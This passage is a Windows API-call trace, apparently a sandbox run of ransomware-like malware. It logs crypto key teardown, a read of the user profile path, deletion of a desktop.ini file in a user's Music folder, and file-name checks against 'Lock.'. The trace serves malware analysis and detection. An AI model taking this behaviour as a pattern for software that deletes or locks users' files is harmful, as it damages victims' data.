lpUsedDefaultChar=0x0) returned 16 [0205.718] CryptDestroyKey (hKey=0x9e1eb8) returned 1 [0205.718] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0205.718] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0205.718] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0205.718] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0205.719] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0205.719] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0205.719] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0205.719] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0205.719] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0205.719] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0205.719] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0205.719] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0205.719] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0205.719] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0205.719] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0205.719] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0205.719] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0205.719] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0205.719] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0205.719] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0205.719] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0205.719] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0205.719] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0205.719] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0205.719] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0205.719] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0205.719] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0205.720] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0205.720] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0205.720] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0205.720] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0205.720] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0205.720] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0205.720] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0205.720] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0205.720] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0205.720] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0205.720] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0205.720] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0205.720] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0205.720] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0205.720] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0205.720] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0205.720] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0205.720] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0205.720] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0205.720] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0205.759] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0205.759] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0205.759] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0205.760] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0205.760] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0205.760] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0205.760] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0205.760] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x29f7120, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0205.760] CryptReleaseContext (hProv=0xa7c000, dwFlags=0x0) returned 1 [0205.760] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0205.760] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0205.760] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0205.760] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0205.760] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0205.760] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0205.760] FreeLibrary (hLibModule=0x76390000) returned 1 [0205.760] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0205.760] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0205.760] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0205.760] CloseHandle (hObject=0x50c) returned 1 [0205.762] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0205.762] CloseHandle (hObject=0x4ac) returned 1 [0205.764] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0205.764] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0205.764] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0205.764] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf438, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0205.765] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\desktop.ini", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\Music\\desktop.ini", lpFilePart=0x8cedf4*="desktop.ini") returned 0x21 [0205.765] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Music\\desktop.ini" (normalized: "c:\\users\\fd1hvy\\music\\desktop.ini")) returned 0x26 [0205.765] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\desktop.ini", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x4409f518, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x4409f518, ftLastAccessTime.dwHighDateTime=0x1d32722, ftLastWriteTime.dwLowDateTime=0xce3d633b, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="desktop.ini", cAlternateFileName="")) returned 0x9e1db8 [0205.765] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\desktop.ini" (normalized: "c:\\users\\fd1hvy\\music\\desktop.ini")) returned 1 [0205.767] FindNextFileW (in: hFindFile=0x9e1db8, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x4409f518, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x4409f518, ftLastAccessTime.dwHighDateTime=0x1d32722, ftLastWriteTime.dwLowDateTime=0xce3d633b, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0205.767] FindClose (in: hFindFile=0x9e1db8 | out: hFindFile=0x9e1db8) returned 1 [0205.767] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a74ec8 | out: hHeap=0x2af0000) returned 1 [0205.767] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722c8 | out: hHeap=0x2af0000) returned 1 [0205.767] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7f8 | out: hHeap=0x2af0000) returned 1 [0205.767] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa810 | out: hHeap=0x2af0000) returned 1 [0205.767] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa708 | out: hHeap=0x2af0000) returned 1 [0205.768] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0205.768] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0205.768] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0205.768] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72238 [0205.768] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7e0 [0205.768] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa720 [0205.768] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72368 [0205.768] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0205.768] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0205.768] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x29f7878 [0205.768] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72318 [0205.768] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0205.768] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0205.768] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5a0 [0205.768] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa798 [0205.768] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0205.768] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa768 | out: hHeap=0x2af0000) returned 1 [0205.768] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa768 [0205.768] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722f8 [0205.769] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf438, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0205.769] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7c8 [0205.769] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77eb8 [0205.769] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72388 [0205.769] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722f8 | out: hHeap=0x2af0000) returned 1 [0205.769] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0205.769] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72318 | out: hHeap=0x2af0000) returned 1 [0205.770] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0205.770] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa798 | out: hHeap=0x2af0000) returned 1 [0205.770] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa768 | out: hHeap=0x2af0000) returned 1 [0205.770] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5a0 | out: hHeap=0x2af0000) returned 1 [0205.770] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa600 | out: hHeap=0x2af0000) returned 1 [0205.770] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa720 | out: hHeap=0x2af0000) returned 1 [0205.770] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7e0 | out: hHeap=0x2af0000) returned 1 [0205.770] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721f8 [0205.770] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7020 [0205.770] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa720 [0205.770] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x60) returned 0x2a74f30 [0205.770] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77eb8 | out: hHeap=0x2af0000) returned 1 [0205.770] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa720 | out: hHeap=0x2af0000) returned 1 [0205.770] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa810 [0205.770] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa810 | out: hHeap=0x2af0000) returned 1 [0205.770] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722f8 [0205.770] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722f8 | out: hHeap=0x2af0000) returned 1 [0205.770] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa588 [0205.770] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa588 | out: hHeap=0x2af0000) returned 1 [0205.770] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7020 | out: hHeap=0x2af0000) returned 1 [0205.770] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721f8 | out: hHeap=0x2af0000) returned 1 [0205.770] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0205.770] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0205.770] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72298 [0205.770] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0205.771] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa720 [0205.771] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72368 [0205.771] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa810 [0205.771] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0205.771] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa810 | out: hHeap=0x2af0000) returned 1 [0205.771] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa720 | out: hHeap=0x2af0000) returned 1 [0205.771] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa600 | out: hHeap=0x2af0000) returned 1 [0205.771] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0205.771] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x44) returned 0x2a5da70 [0205.771] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\desktop.ini", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\Music\\desktop.ini", lpFilePart=0x8cf650*="desktop.ini") returned 0x21 [0205.771] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5da70 | out: hHeap=0x2af0000) returned 1 [0205.771] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Music\\desktop.ini" (normalized: "c:\\users\\fd1hvy\\music\\desktop.ini")) returned 0xffffffff [0205.771] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a74f30 | out: hHeap=0x2af0000) returned 1 [0205.771] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0205.771] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7c8 | out: hHeap=0x2af0000) returned 1 [0205.771] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa708 | out: hHeap=0x2af0000) returned 1 [0205.771] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0205.771] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7f8 | out: hHeap=0x2af0000) returned 1 [0205.771] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0205.771] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ed80 | out: hHeap=0x2af0000) returned 1 [0205.771] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0205.771] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0205.771] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72248 [0205.771] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72268 [0205.771] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0205.772] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa720 [0205.772] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72258 [0205.772] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721f8 [0205.772] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721f8 | out: hHeap=0x2af0000) returned 1 [0205.772] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0205.772] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72258 | out: hHeap=0x2af0000) returned 1 [0205.772] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa810 [0205.772] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72318 [0205.772] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa798 [0205.772] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72318 | out: hHeap=0x2af0000) returned 1 [0205.772] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="E6IDgLQGE97MYwh0a.wav", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0205.772] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="6IDgLQGE97MYwh0a.wav", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0205.772] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="IDgLQGE97MYwh0a.wav", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0205.772] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DgLQGE97MYwh0a.wav", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0205.772] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="gLQGE97MYwh0a.wav", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0205.772] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LQGE97MYwh0a.wav", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0205.772] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="QGE97MYwh0a.wav", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0205.772] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GE97MYwh0a.wav", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0205.772] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="E97MYwh0a.wav", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0205.772] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="97MYwh0a.wav", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0205.772] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="7MYwh0a.wav", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0205.772] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MYwh0a.wav", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0205.772] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Ywh0a.wav", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0205.772] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wh0a.wav", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0205.772] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="h0a.wav", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0205.772] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0a.wav", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0205.772] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="a.wav", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0205.772] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, 